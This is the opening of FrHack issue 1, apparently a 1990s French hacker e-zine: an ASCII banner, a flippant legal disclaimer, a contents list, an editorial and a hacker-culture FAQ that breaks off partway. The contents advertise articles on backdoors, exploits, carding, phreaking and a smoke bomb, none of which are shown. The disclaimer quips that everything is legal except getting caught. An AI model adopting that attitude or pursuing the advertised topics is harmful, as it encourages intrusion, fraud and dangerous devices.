FRHACK # 1 _________ ________ (_________)) (________)) (___________)) (_____)) (_)) (_____))____ (_____))__(_)) ___ ___ (___________)) (__________)) (___) (___) (_____)) (_____)) (_)) (___)___ _______ ______ (___)___ (_____)) (_____)) (_)) (_______)(_______)( ____)(_______) (_____)) (_____)) (_)) (___) (_)(___)(__)( (____ (___()__) (_____)) (_____)) (_)) (___) (_)(_______)(______)(___) (_) _ _____ ___ ___ _____ ______ ____ __ (_) ____ ( __) ( _)(_ ) ( _ ) ( ___) ( _ ) ( ) ( __v) ) (__ __ )( \/ ) ) ) (_) ( ) ( __ )( (_) )( (_/(_a) ( __)(__)( ) ( ) ( (---) ) ( ) ) _) ( ) (_)( ) (_t) ) (__ )( )( )( )( ) (__( ) )( ( ))( (_o) (_____) (__) (__) (__) (__) (_______) (__) (___) (_o) IRC: #hack.FR Web: http://www.frhack.org -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- * Disclaimer * (L'equipe de FrHack) Le Contenu de ce emag peut heurter la sensidebilite de certaines personnes, veuillez lire attentivement les conditions avant de decider si vous souhaitez aller au-dela de ce disclaimer. C'est triste de voir que l'on vit dans un monde ou la tartine de merde qui suit est necessaire, enfin bon, allons-y: Durant les "brefs" points suivants, "FrHack" represente quiconque ayant participe, de près ou de loin, a l'élaboration de ce emag et des articles qui s'y trouvent. Le matériel contenu sur ce sur site est uniquement la pour l'amusement de l'esprit et ne peut etre utilise qu'a des fins educatives. Certains fichiers textes expliquent en details comment supprimer la protection contre la copie de programmes, comment penetrer a l'insu d'une personne, et/ou d'une societe, un ordinateur,et/ou un systeme d'ordinateurs. Aucune activite illegale n'est, et ne peut etre, mise a charge et/ou condamner FrHack. (en clair: c'est po nous qui faut dénoncer en cas de gaffe) Acceder, de facon consciente ou non, a un ou des ordinateurs sans authorisation ou exceder les droit d'acces alloues, et par ce comportement obtenir n'importe quel type d'informations est illegal. Causer l'interruption d'un programme, d'informations, de code, de commandes sur un ordinateur ou un systeme d'ordinateurs sans authorisation est illegal. (En clair: Dans de nombreux pays, un "simple" nuke est punissable d'emprisonnement ainsi que d'une amende. Alors, allez formatter les disques de la CIA, mais ne venez pas vous plaindre, quand vous serez en taule, du mec derriere vous qui vient de laisser tomber son savon... ) FrHack n'assume absolument aucunes responsabilites pour quoi que ce soit dans ce emag ou n'importe lequel des articles s'y trouvant, des consequences que ceux-ci pourraient avoir sur vous, sur votre sante mentale, votre ordinateur, votre chien, femme, belle-mere, escaliers, ceux qui les montent, ainsi que tout ce qui peut avoir un rapport avec vous et votre miserable existance. (En clair: Certain des fichiers ici traitent des virus, si votre disque dur a des ratés, ne venez pas NOUS faire chier avec VOS problemes. ) Chaques articles et/ou textes apparaissant dans ce emag est egalement soumis a n'importe quel "disclaimer" (ou charte de denegation, inculte!) qui y est inclu. De plus, les auteurs des ces textes ne peuvent etres retenus comme responsable pour des dommages speciaux, accidentels et/ou consequents a l'utilisation, et/ou a la mauvaise utilisation, des informations contenues dans ces fichiers, meme si cela a deja ete porte a l'attention de FrHack.) ( En clair: Jouer avec du code de bas niveau peut serieusement endomager vos fichiers et/ou votre material, un fois encore c'est VOTRE probleme. ) Attention, les articles et/ou les textes qui s'y trouvent, sont fournis "tel quel", la precision et la justesse des informations qui y sont contenues sont sujettes a des conjectures. Aucune garantie implicite, ou non implicite, et d'aucun type que ce soit, n'est assuree par FRHack. Vous utilisez les informations qui y sont fournies a vos propres risques! Cependant, FrHack s'engage a ESSAYER de fournir le moins d'informations erronees qu'il lui est possible. (En clair: nous sommes humains, les erreurs aussi... ) Toutes les informations contenues ici vous sont proposee sans echanges, ni payements sous quelque forme que ce soit. Cependant,les auteurs de ces articles ont inclus leurs propres conditions d'utilisation, par exemple certains demandent que vous les citiez si vous utilisez leurs sources. (En clair: Un E-Mail ou une petite carte postale pour remercier les auteurs d'articles que vous avez trouve utiles, ne serait pas du luxe.) La liberte d'expression sur le net. Les informations n'ont jamais tues quelqu'un, c'est l'utilisation que l'ont peut en faire qui est dangereuse! Alors, battez-vous contre les imbeciles si vous voulez, mais ne nous emmerdez pas avec la censure. Internet est, et doit rester, l'autoroute de l'information. Dur choix, mais qui est le notre. (En clair: On vous entend deja "... oui, mais la pedophilie... la mafia...", heu les gars, on est au courant et on s'implique dans des mouvements contre ces problemes. Mais si vous voulez que tout ca s'arrete, rendez vous chez vos authorites locale et demandez leur de faire quelque chose, et faites quelque chose vous aussi. Mais ne blamez pas tout le monde parce qu'il y a des emmerdeurs! On est pas responsable des problemes des autres!) Tout les personnages mentionnes sur ce site et/ou dans les fichiers qui y sont disponible sont purement et simplement fictifs. Toutes ressemblances avec des personnes, vivantes ou decedees, est purement accidentelle et n'est le fruit que de la coincidence. (En clair: On fait souvent reference a Mr Lamer. Non, ce n'est PAS vous! hein? ) Finalement, ce site est reserves exclusivement aux gens qui, agreeant aux points precedents, ne font pas partie des categories suivantes: employe d'un etat ou de n'importe quelle institution et/ou agence gouvernementale (ce hormis d'une universite), de l'armee ou de la police, et/ou membre d'un parti et/ou d'une organisation politique de quelque pays/etats que ce soit. (En clair: hum, en gros on veut po de V) En continuant a lire ce emag, vous agreez entierement a tout ce qui a ete enonce ci-avant et vous vous engagez a ne pas utiliser les informations contenues sur ce site de quelque maniere qui pourrait entrer en conflit avec vos lois locales ainsi qu'avec la charte des droits de l'Homme. (En clair: Tout est légal sauf ce faire prendre) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- * Sommaire * _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ )--------) (---------------------------------------------) (-------------------( ( # ( ) SUJET ( ) AUTEUR ) )||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||( ( I ( ) Editorial ( ) Utopiste ) ) II ) ( Foire Aux Questions (Les pirates) ) ( Majestix ( ( III ( ) Code du Hackeur ( ) Les Hackeurs ) ) IV ) ( Petites annonces ) ( Utopiste ( ( V ( ) Extraits de conversations sur #hack.FR ( ) Visiteurs ) ) VI ) ( NFS ) ( Ktulu ( ( VII ( ) Comment se connecter gratos sur Internet ( ) Jipi ) ) VIII ) ( Frontpage 1998 ) ( Opak ( ( IX ( ) Sniffing TCP ( ) Fedaikin ) ) X ) ( Backdoor UNIX ) ( Bubble ( ( XI ( ) Email anonyme ( ) Utopiste ) ) XII ) ( Exploit NetBIOS ) ( Sice (et vatoo) ( ( XIII ( ) Quelques trucs pour IRC ( ) Utopiste ) ) XIV ) ( Social engineering ) ( Brain Override ( ( XV ( ) Le monde des Zels ( ) Vatoo ) ) XVI ) ( Enlever la protection d' un MBP BIOS ) ( Viking ( ( XVII ( ) Les taupes (ou chevaux de Troie) ( ) Majestix ) ) XVIII ) ( Introduction au Phreaking ) ( CyberRider ( ( XIX ( ) Les Exploits ( ) Protek ) ) XX ) ( Trouver des serveurs et les mapper ) ( Binf_ ( ( XXI ( ) Fonctionnement des bases de registre ( ) Utopiste ) ) XXII ) ( Penetration d' un HD: et apres? ) ( Majestix ( ( XXIII( ) Le Nuke ( ) Utopiste ) ) XXIV ) ( Le Fantasmique Monde du Carding ) ( Vatoo ( ( XXV ( ) Enlever un cheval de Troie ( ) Jipi ) ) XXVI ) ( Un petit exploit contre NT ) ( Un guru de secu ( ( XXVII( ) La base de registre: Comment ca marche ( ) Utopiste ) ) XXVIII) ( la bombe fumigene ) ( Kwenon ( ( XXIX ( ) Le space pudding ( ) Mist0 ) ) ) ( Les wingates ) ( ( ( ( ) ( ) ) ) ) ( CONCLUSION ) ( Utopiste ( ( _ _ ( _ ) _ _ _ _ _ _ _ _ _ _ _ ( _ ) _ _ _ _ _ ) )/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= Editorial =- (par Utopiste) Cher lecteur, lectrice L'Equipe de FrHack est fiere de vous presenter le premier numero de son emag du mwme nom... Ce emag, est avant tout un travail d'equipe et je tiens a remercier toutes les personnes qui ont permis sa realisation, je tiens aussi a faire un salut special a tous les programmeur-hackeur qui ont compris qu'il n'a rien de mieu que passer une nuit blanche devant son computer avec une bonne pizza ou un bon coke ( ou encore un bol de cereale pour certain ;) ) .... Mais aussi tout les autres qui dans le passe ont lutte sous la baniere de l'underground... J'aurais aime vous faire un editorial sans politique, sans economie et sans critiques sociales, cepandant l'etat de notre societe m'oblige a faire le contraire. J'aurais aime vous dire que le gouvernement qui nous gouverne n'est pas des salauds, que les entreprises ne s'enrichissent pas sur votre dos et que les services secrets n'ont pas de dossier sur vous... Cepandant, il existe l'underground qui lutte contre ca, alors si vous désirez sauver notre planète, réagisser et battez vous.... Pour cet editorial, j'ai assez joue les moralisateurs, je n'ai qu'une derniere remarque a faire sur ce emag: La connaissance sans la conscience pour l'utiliser ne donne rien... Mediter sur cet phrase.... Moi et toutes l'equipe de FrHack, vous souhaitons bonne lecture et esperons que pour une premiere parution, nous allons pas trop vous decevoir. Utopiste (utopiste@hotmail.com) =-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= FAQ - sur les pirates informatiques =- (par Majestix) Avant de rentrer dans les detail plus technique, attardons nous un peu sur ce qu'est un hackeur... Peut-etre qu'il aura certain hackeur qui seront contre certain idee ou principe enonce dans cet article, si oui, envoyer vos commentaire. 1.1 Pourquoi ce document? Dès que tu commence a etre un peu reconnu dans le millieu, paf, ca y est tu commence a recevoir des email: " Je veux devenir hackeur, je fait quoi ? " ou " tu veux devenir mon professeur de hack " ou encore " c'est koi un hackeur, car .... ". Comme il a pas enormement de doc en francais sur ce sujet, nous avons decider d'ecrire un petit document sympa sur ce sujet. 1.2 Qu'est-ce qu'un hacker? Le Jargon File [traduit en français sous le titre " Cyberlexis ", aux editions Masson, NDLA] contient un certain nombre de definitions du terme ``hacker'', qui sont toutes liees à l'aptitude technique et au plaisir pris à resoudre des problèmes et à depasser des limites arbitraires. Cepandant, la definition de hackeur publier par l'office de la langue francaise est un peu moins elogieuse et aussi plus fausse : """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" pirate informatique; Criminel informatique qui exploite les failles dans une procedure d'accès pour casser un sytème informatique, qui viole l'integrite de ce système en derobant ou en detruisant de l'information ou qui copie frauduleusement des logiciels """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" Il existe une communaute, une culture partagee, de programmeurs experimentes et de specialistes des reseaux dont l'histoire remonte aux premiers mini-ordinateurs multi-utilisateurs, il y a quelques dizaines d'annees, et aux premières experiences de l'ARPAnet. Les membres de cette culture ont cree le mot ``hacker''. Ce sont des hackers qui ont cree l'Internet. Ce sont des hackers qui ont fait du système d'exploitation Unix ce qu'il est de nos jours. Ce sont des hackers qui font tourner les newgroups, Usenet et le World Wide Web, et se sont encore souvent les hackers qui lutte contre la pedophilie et le raciste dans le monde de l'informatique. Si vous faites partie de cette culture, si vous y avez contribue et si d'autres personnes qui en font partie savent qui vous êtes et vous considèrent comme un hacker, alors vous êtes un hacker. L'etat d'esprit d'un hacker ne se reduit pas à cette culture des hackers du logiciel. Il y a des gens qui appliquent l'attitude du hacker à d'autres domaines, comme l'electronique, les tele-communications ou la musique. En fait, on trouve cet esprit à l'etat le plus avance dans n'importe quel domaine de la science ou des arts. Les hackers du logiciels reconnaissent cette similitude d'esprit, et certains affirment que la nature même du hacker est independante du domaine particulier auquel le hacker se consacre reellement. Mais dans la suite de ce document, nous nous concentrerons sur les aptitudes et les attitudes des hacker informatiques, et sur les traditions de la culture partagee qui a cree le terme ``hacker''. 1.3 L'attitude des hackers Les hackers resolvent des problèmes, invente de nouveau concept, construisent des choses, et ils croientà la liberte et à l'entraide volontaire. Pour être accepte comme un hacker, vous devez vous comporter comme si vous aviez ce type d'attitude vous-même. Et pour vous comporter comme si vous aviez ce type d'attitude, vous devez vraiment y croire. Mais si vous pensez qu'adopter l'attitude d'un hacker vous fait automatiquement accepte dans la culture des hackers, alors vous êtes sur la mauvaise voiex: il faut croire à ces principes pour en tirer la motivation personnelle pour continuer à apprendre. Comme pour tous les arts creatifs, la façon laplus efficace de devenir un maître est d'imiter l'etat d'esprit des maîtres -- non seulement intellectuellement mais aussi emotionnellement. Donc, pour devenir un hacker, repetez les phrases suivantes jusqu'à y croire reellement: 1. Le monde est plein de problèmes fascinants qui n'attendent que d'être resolus. C'est trèèèèès amusant d'être un hacker, mais c'est un amusement qui demande beaucoup d'efforts, et l'effort demande de la motivation. Les champions sportifs tirent leur motivation d'un plaisir physique à accomplir des performances avec leur corps, à depasser leurs propres limites physiques. De façon similaire, pour être un hacker, il faut ressentir une certaine excitation à resoudre des problèmes, à affuter ses competences, à exercer son intelligence. Si pour vous cette façon de penser n'est pas naturelle, il faut qu'elle le devienne si vous voulez devenir un hacker. Autrement, vous allez decouvrir que votre energie va se disperser dans des distractions comme le sexe, l'argent ou la reconnaissance sociale. (Vous devez egalement developper une certaine foi en votre propre capacite d'apprentissage: même si vous ne savez pas tout ce qu'il faut pour resoudre un problême, si vous en traitez seulement une partie et que vous en apprenez quelque chose, alors vous allez reussir à traiter la partie suivante, et ainsi de suite jusqu'à ce que le problème soit resolu.) 2. Personne ne devrait jamais avoir à resoudre le même problème deux fois. Les cerveaux creatifs sont une ressource precieuse et limitee. Il ne faut pas la gàcher en reinventant la roue quand il y a tant de problèmes fascinants qui attendent. Pour vous comporter comme un hacker, vous devez vous convaincre que le temps de pensee des autres hackers est precieux, à tel point que c'est pour vous une obligation morale de partager vos informations, de resoudre des problèmes et d'en donner les solutions pour que les autres hackers puissent resoudre de nouveaux problèmes au lieu de perpetuellement revenir sur les mêmes (Écrire des articles dans un emag ou encore publier des tutorials sont d'excellent moyen de diffuser l'informations) (Il n'est pas necessaire de vous croire oblige de donner toute votre production creative, bien que les hackers les plus respectes soient ceux qui le font. Il est tout à fait compatible avec les valeurs des hackers d'en vendre une partie suffisante pour payer sa nourriture, son loyer et ses ordinateurs, d'entretenir une famille et même de devenir riche, à condition de ne jamais oublier que vous êtes un hacker pendant tout ce temps.) 3. La routine et l'ennui sont inacceptables. Les hackers (et les gens creatifs en general) ne devraient jamais se consacrer à des tâches ennuyeuses ou repetitives, parce que cela signifie qu'ils ne font pas pas ce qu'eux seuls savent faire: resoudre de nouveaux problèmes. Pour se comporter comme un hacker, vous devez vous en convaincre suffisamment pour automatiser les parties ennuyeuses de votre travail, non seulement pour vous-même mais aussi pour tous les autres (et particulièrement les autres hackers). (Il y a une exception apparente à cette règle: un hacker va parfois faire des choses qui semblent repetitives ou ennuyeuses à un observateur pour se vider l'esprit, ou pour acquerir une nouvelle competence, ou pour faire une experience particulière. Mais c'est toujours par choix: une personne capable de penser ne devrait jamais être forcee à faire un travail ennuyeux.) 4. Vive la liberte! Les hackers sont naturellement anti-autoritaristes. Si une personne peut vous donner des ordres, elle peut vous empêcher de resoudre le problème particulier, quel qu'il soit, par lequel vous êtes fascine à un instant donne. Et, vu la façon dont les esprits autoritaristes fonctionnent, elle trouvera en general une raison particulièrement stupide de le faire. Par consequent, les attitudes autoritaristes doivent être combattues partout où elles se trouvent. (Ce n'est pas la même chose que de combattre toute forme d'autorite. Les enfants ont besoin d'être guides, et les criminels d'être arrêtes. Un hacker peut accepter de se soumettre à une certaine forme d'autorite pour obtenir quelque chose qu'il desire plus que le temps perdu à suivre les ordres. Mais c'est un marchandage limite, conscient. Une soumission totale à une autorite donnee est hors de question.) Les autoritaristes se nourrissent de censure et de secrets. Et ils se mefient de l'entraide mutuelle et du partage d'informations. Ils n'apprecient la ``cooperation'' que quand ils peuvent la contrôler. Donc, pour vous comporter comme un hacker, vous devez developper une hostilite instinctive vis-à-vis dela censure, du secret et de l'usage de la force ou de la ruse pour dominer des adultes responsables. Et vous devez vous tenir prêt à agir conformement à cette conviction. 5. L'attitude n'est pas un substitut à la competence. Pour être un hacker, vous devez developper un certain nombre de ces attitudes. Mais cela seul ne suffira pas à faire de vous un hacker, pas plus qu'un champion sportif ou une rock star. Pour devenir un hacker, il faut de l'intelligence, de l'experience, de la perseverance et beaucoup de travail. Par consequent, vous devez apprendre à; vous mefier des attitudes et à respecter les competences, quelles qu'elles soient. Les hackers ne se laissent pas impressionner par les poseurs, mais ils apprecient les competences, particulièrement les competences de hackers, mais aussi toutes les autres. Les competences dans les domaines exigeants maîtrisees par une elite sont particulièrement appreciees, et plus particulièrement celles qui necessitent un esprit perçant et une grande concentration. Si vous respectez la competence, alors vous aimerez travailler à vous ameliorer sans cesse, et celà sera plus un plaisir qu'une routine. C'est vital pour devenir un hacker. 2.0 Les competence de base du hacker. Il est vital d'avoir une attitude de hacker, mais encore plus vital d'en avoir les competences. L'attitude n'est pas un substitut pour la competence, et il convient de developper un ensemble minimal de competences avant que l'idee n'effleure un autre hacker de vous accepter comme son pair. Cet ensemble change lentement au cours du temps, au fur et à mesure que l'evolution technologique cree de nouvelles competences et en rend d'autres obsolètes. Par exemple, à une certaine epoque il convenait de savoir programmer en assembleur, et il n'etait pas question, jusqu'à une date recente, de HTML. En tout etat de cause, il est clair que cela inclut, mi 1998: 1. Apprendre à; programmer. C'est, evidemment, la competence fondamentale du hacker. En 1997, le langage à connaitre absolument est le C (mais ce n'est probablement pas celui qu'il faut apprendre en premier). Mais vous n'êtes pas un hacker complet (ni même juste un programmeur) si vous ne connaissez qu'un seul langage. Il faut apprendre à penser à la programmation en termes generaux, independamment d'un langage particulier. Pour être un hacker complet, il faut être arrive au point où vous pouvez apprendre un nouveau langage en quelques jours, en faisant le rapport entre ce qui est ecrit dans le manuel et vos propres connaissances. Cela signifie que vous devez apprendre plusieurs langages très differents. A part le C, vous devez egalement apprendre LISP, et Java aura bientôt sa place egalement dans la liste. En plus d'être les langages les plus pratiques par les hacker, ils representent chacun une approche très differente de la programmation, et contribueront de façon très sensible à votre education. nous ne pouvons pas vous donner un cours complet sur ``comment apprendre à programmer'', c'est quelque chose de très complexe. Mais je peux vous dire que les livres et les cours ne suffisent pas (la plupart des meilleurs hackers sont autodidactes). Ce qu'il faut, c'est (a) lire du code et (b) ecrire du code. Apprendre à programmer, c'est comme apprendre à ecrire correctement dans un langage humain. La meilleure façon d'y arriver, c'est de lire des trucs ecrits par des maîtres, d'en ecrire un peu, d'en lire beaucoup plus, d'en ecrire un peu plus, etc. jusqu'à ce que vous arriviez à ecrire avec la même force et la même economie de moyens que vos modèles. Trouver du bon code à lire a longtemps ete difficile, parce qu'il y avait très peu de gros programmes disponibles sous forme de sources pour que les apprentis hacker puissent les lire et les etudier. Heureusement, cette situation a evolue, et maintenant des logiciels libres, des outils de programmation libres et des systèmes d'exploitation libres (tous disponibles sous forme de sources, tous ecris par des hackers) sont maintenant très faciles à trouver. Cela nous ammène directement à notre sujet suivant... 2. Installer un Unix libre et apprendre à s'en servir. Je vais supposer que vous possedez, ou que vous avez accès à un ordinateur personnel. Pour un debutant qui aspire à acquerir des competences de hacker, l'action la plus importante à entreprendre est d'obtenir une copie de Linux ou d'un des clones de BSD, de l'installer sur une machine personnelle, et de le faire tourner. (la version slakware 3.5 est recommande) Bien sûr, il y a d'autres systèmes d'exploitation dans le monde à part Unix. Le problème, c'est qu'ils sont distribues sous forme de binaires. Vous ne pouvez pas lire le code, et encore moins le modifier. Apprendre à hacker sur une machine DOS ou Windows, ou sous MacOS, c'est le meilleur moyen de commencer mais cela devient limitant pour continuer, c'est comme d'apprendre à danser en etant plàtre des pieds à la tête. En plus, Unix est le système d'exploitation de l'Internet. On peut apprendre à utiliser l'Internet sans connaittre Unix, mais on ne peut pas être un hacker de l'Internet sans le comprendre. C'est pour cette raison que la culture des hackers est à l'heure actuelles fortement Unix-centrique. (Ce n'a pas ete toujours le cas, et quelques hackers âges regrettent cet etat de fait, mais la symbiose entre Unix et l'Internet est devenue suffsamment forte pour que même Microsoft semble s'y casser les dents.) Donc, installez un Unix. Apprenez-le. Faites-le touner. Parlez à l'Internet avec. Lisez le code. Modifiez le code. Vous trouverez de meilleurs outils de programmation (y compris C, Lisp, Perl) que sous n'importe quel système d'exploitation de Mikro$oft (vous trouverez surement Unix plus performant que windows) , vous vous amuserez, et vous en tirerez plus de connaissances que ce que vous avez l'impression d'apprendre, jusqu'à ce que vous deveniez un vrai maître hacker. Pour en savoir plus sur comment apprendre Unix, voir Loginataka (http://www.ccil.org/~esr/faqs/ loginataka.html) Pour obtenir Linux, voir http://www.ssc.com/linux/resources/ftp.html ou encore en françaix, allez voir sur http://www.freenix.org/linux/ ou encore sur http://www.loria.fr/linux 3. Apprendre à utiliser le World Wide Web et à ecrire en HTML. La plupart des choses creees par la culture des hackers travaillent dans l'ombre, en aidant à faire tourner des usines, des bureaux et des universites, sans impact direct sur les vies des non-hackers. Il y a une grosse exception, le Web, ce jouet de hacker enorme et lumineux dont même les politiciens admettent qu'il est en train de changer la face du monde. Rien que pour cette raison (et pour de bonnes raisons par ailleurs), vous devez apprendre à travailler avec le Web. Cela ne signifie pas seulement apprendre à utiliser un browser mais aussi apprendre à ecrire en HTML, le langage de balisage du Web. Si vous ne savez pas programmer, le fait d'ecrire en HTML vous apprendra quelques habitudes mentales qui vous aideront à demarrer. Donc, faites-vous une home page Mais ce n'est pas seulement d'avoir une home page qui fera de vous un hacker. Le Web est plen de home pages. La plupart sont d'un interêt absolument nul, parfois jolies à regarder mais nulles quand même... Pour être utile, votre page doit avoir du contenu, elle doit être interessante et/ou utile pour les autres hackers. Cela nous conduit à notre sujet suivant... Les statuts dans la culture des hackers Comme pour la plupart des cultures sans economie monetaire, le fondement de la culture des hacker est la reputation. Vous essayez de resoudre des problèmes interessants, mais seuls vos pairs, ou vos superieurs dans la hierarchie technique, sont à; même de juger si ces problèmes sont interessants, et si ces solutions sont vraiment correctes. Par consequent, si vous jouez le jeu du hacker, vous apprenez le score principalement à partir de ce que les autres hackers pensent de vos capacites, et c'est pour ça que l'on n'est vraiment un hacker que lorsque les autres hackers vous considèrent comme tel. Ce fait est obscurci par l'image du hacker comme un travailleur solitaire, aussi bien que par un tabou de la culture des hacker (qui s'estompe progressivement mais qui reste present): le fait d'admettre qu'une partie de sa motivation vient de son ego ou de la recherche d'une acceptation externe. (Il ne faut pas oublier que plusieur personne peuvent avoir un avis different sur la même personne car un hacker ne va pas raconter sa vie a la première personne venu) De façon specifique, le monde des hacker constitue ce que les anthropologues appellent une "culture du don". On obtient un statut ou une reputation non pas en dominant les autres, en etant beau, ou en possedant des choses que les autres desirent,mais en faisant des dons: de son temps, de sa creativite,du resultat de ses competences. Il y a principalement cinq types de choses à; faire pour être respecte par les hackers: 1. Ecrire des logiciels libres. La première, la plus centrale et la plus traditionnelle, est d'ecrire des programmes dont les autres hackers pensent qu'ils sont amusants ou utiles, est de faire don du code source pour que toute la communaute des hacker puisse les utiliser. (Les hacker les plus respectes dans l'univers des hackers sont ceux qui ont ecris des programmes importants, utiles, qui correspondent à un besoin repandu, et qui en ont fait don à la communaute, de sorte que maintenant tout le monde s'en sert.) 2. Aider à tester et à debugger des logiciels libres. Il est egalement utile d'aider à; debugger et à perfectionner les logiciels libres. Dans ce monde imparfait, nous passons inevitablement la part la plus importante du temps de developpement d'un logiciels dans la phase de debuggage. C'est pour cela que les auteurs de logiciels libres savent que des bon beta-testeurs (ceux qui savent decrire les symptômes clairement, localiser precisement les problèmes, qui peuvent tolerer quelques bugs dans une distribution rapide et qui sont prêt à appliquer une procedure de diagnostic simple) valent leur pesant d'or. Un seul d'entre eux peut faire la difference entre une seance de debuggage cauchemardesque et une simple nuisance salutaire. Si vous êtes un debutant, essayez de trouver un programme en cours de developpement qui vous interesse et de devenir un bon beta-testeur. C'est une progression naturelle que de commencer par aider à tester des programmes, puis d'aider à les debugger, puis d'aider à les modifier. Vous apprendrez beaucoup de cette façon,et vous vous ferez un bon karma par rapport à des gens qui vous aideront plus tard. 3. Publier des informations utiles. Une autre bonne chose est de reunir et de filtrer des informations utiles et interessantes sous forme de pages Web ou de documents comme les FAQs (listes de Frequently Asked Questions, [en français,Foires Aux Question, NDLA]) et de les rendre accessibles à tous. (Les personnes qui maintiennent les FAQs techniques les plus importantes sont presque autant respectees que les auteurs de logiciels libres.) 4. Aider à faire tourner l'infrastructure. La culture des hacker (et le developpement technique de l'Internet) marche gràce à des volontaires. Il y a beaucoup de travail peu excitant, mais necesaire, qui doit être fait pour que ça continue à; tourner: administrer les mailing lists [listes de distributions, NDLA], moderer les newsgroups, gerer les sites d'archives de logiciels, ecrire les RFC [Requests For Comments, les ``normes'' de l'Internet] et autres standards techniques. Les gens qui font ce genre de choses sont très respectes, parce que tout le monde sait que c'est un boulot qui demande enormementde temps et qui n'est pas aussi drole que de jouer avec du code. 5. Servir la culture des hackers elle-même. Pour finir, vous pouvez servir et propager la culture elle-même (par exemple, en ecrivant un article (majestix) ou realiser un emag (utopiste) . Ce n'est pas quelque chose qu'il vous sera possible de faire avant d'avoir ete dans le bain pendant un certain dans et d'être devenu bien connu pour l'une des quatre premières choses. La culture des hackers n'a pas de chefs, au sens precis du terme, mais elle a des heros, des historiens et des porte-parole. Quand vous aurez ete dans les tranchees pendant assez longtemps, vous pourrez peut-être devenir l'un de ceux-ci. Mais attention: les hackers se mefient des egos sur dimensionnes chez les anciens de leur tribu. Il faut donc eviter de montrer ouvertement que l'on recherche à obtenir ce genre de celebrite. Il vaut mieux faire en sorte qu'elle vous tombe toute cuite dans votre assiette, et toujours rester modeste à sujet de votre statut. Le hacking et la programmation demande enormement de temps et de concentration, et mieu vaut vous avertir que la vie de couple dans ses conditions ne sera pas toujours excellente. Si votre bonde/femme/mari/chum ne peut pas comprendre qu'il vous faut plus 4 heure par jours d'informatique, et que vous aller vous coucher quand le bug sera resolu (donc vers 2:30 du matin) alors, soit vous abandonner vos idee de hacking ou que vous convertisser votre blonde/femme/mari/chum en hacker (vous pouvez toujours casser aussi) Si vous voulez devenir un hacker parce que vous n'avez pas de vie privee, pas de problème: au moins il n'y aura rien pour vous empêcher de vous concentrer. Et vous finirez peut-être par en avoir une un jour. Style de vie Encore une fois, pour être un hacker, il faut entrer dans l'etat d'esprit du hacker. Pour cela, il y a quelques activites que l'on pratique loin d'un ordinateur qui semblent aider. Ce ne sont evidemment pas des substituts à la pratique de l'informatique, mais de nombreux hackers les pratiquent, et pensent qu'elles sont reliees de façon fondamentale à l'essence du hack. Lire de la science-fiction. Aller à des conventions de SF (un bon moyen pour rencontrer des hackers et des proto-hackers). (Un excellent auteur a lire est Issaac Asimov ) Patiquer le Zen et/ou les arts martiaux (pour la discipline mentale). Ecouter et analyser de la musique, apprendre à apprecier des formes particulières de musique. Apprendre à bien jouer d'un instrument, ou à chanter. Apprecier les jeux de mots, les jeux de reflexion, les casse-têtes et les devinettes (le rubik cube est un bon exemple) Apprendre à bien ecrire dans sa langue maternelle. Plus vous pratiquez ces disciplines, plus il est probable que vous pourrez naturellement faire un bon hacker. Les raisons pour lesquelles ces activites sont importantes ne sont pas claires, mais il semble que ce soit parce qu'elles font intervenir à la fois les parties gauche et droite du cortex (les hackers ont besoin de passez de façon instantanee d'un raisonnement logique à une perception plus subjective d'un problème). Pour finir, une liste de choses à NE PAS faire: Ne pas utiliser des noms de login grandiloquents ou stupides. Ne pas intervenir dans les guerres entre les autres hacker ou personnes, vous risquez de vous faire des ennemis et souvent nuire a l'une des deux personnes. Ne pas s'autoproclamer ``cyberpunk'', et ne pas perdre son temps avec quelqu'un qui le fait. Ne pas poster de message rempli de fautes d'orthographe ou de grammaire. ( La seule reputation que vous vous ferez de cette façon est celle d'un parfait idiot. Les hackers ont la memoire longue. Cela pourra vous prendre plusieurs annees avant que de telles erreurs soient oubliees. ) -= Foire Aux Questions =- Q: Est-ce que pouvez m'apprendre à hacker? La plupart des hackeur sont a 120% occupe par leur propre projet, alors soyiez conscient que leurs temps est precieux. Être un hacker est une attitude et une competence que l'on doit essentiellement apprendre par soi-même.Vous verrez que même si les vrais hackers sont prêts à vous aider, ils ne vous respecteront pas si vous les suppliez de vous transmettre tout ce qu'ils savent à la petite cuillère. Commencez par apprendre deux ou trois choses. Montrez que vous essayez,que vous êtes capable d'apprendre par vous-même. Ensuite, vous pourrez aller voir les hacker avec des questions. Q: Où puis-je trouver des vrais hacker pour discuter avec eux? Sûrement sur IRC (#hack.fr, Undernet (pour le phreak essayer #phreak.fr) ), en tout cas il y a beaucoup des flammeurs et des crackers, à perte de vue. L'autre moyen consiste à contacter un groupe local d'utilisateurs d'Unix ou de Linux et d'aller à leurs reunions (#linuxqc ou #linuxfr) Q: Quel langage dois-je apprendre en premier? HTML, si vous ne le connaissez pas dejà. On trouve plein de livres à la couverture brillante et chamarree sur HTML, qui sont par ailleurs très mauvais, et très peu de bons. Celui que je prefère est ("http://www.ora.com/catalog/html2/" )HTML: The Definitive Guide Si vous voulez commencer à; programmer, je vous conseille de commencer par le Pascal ou à la rigueur le visual basic. Le C est vraiment important, mais beaucoup plus difficile. (Le dephi est aussi un excellent choix) Q: Par où dois-je commencer? Où puis-je trouver un IRC (ou Unix) libre? Je pense qu'il faut que vous veniez absolument sur l'IRC !!. (#hack.fr) Pour devenir un 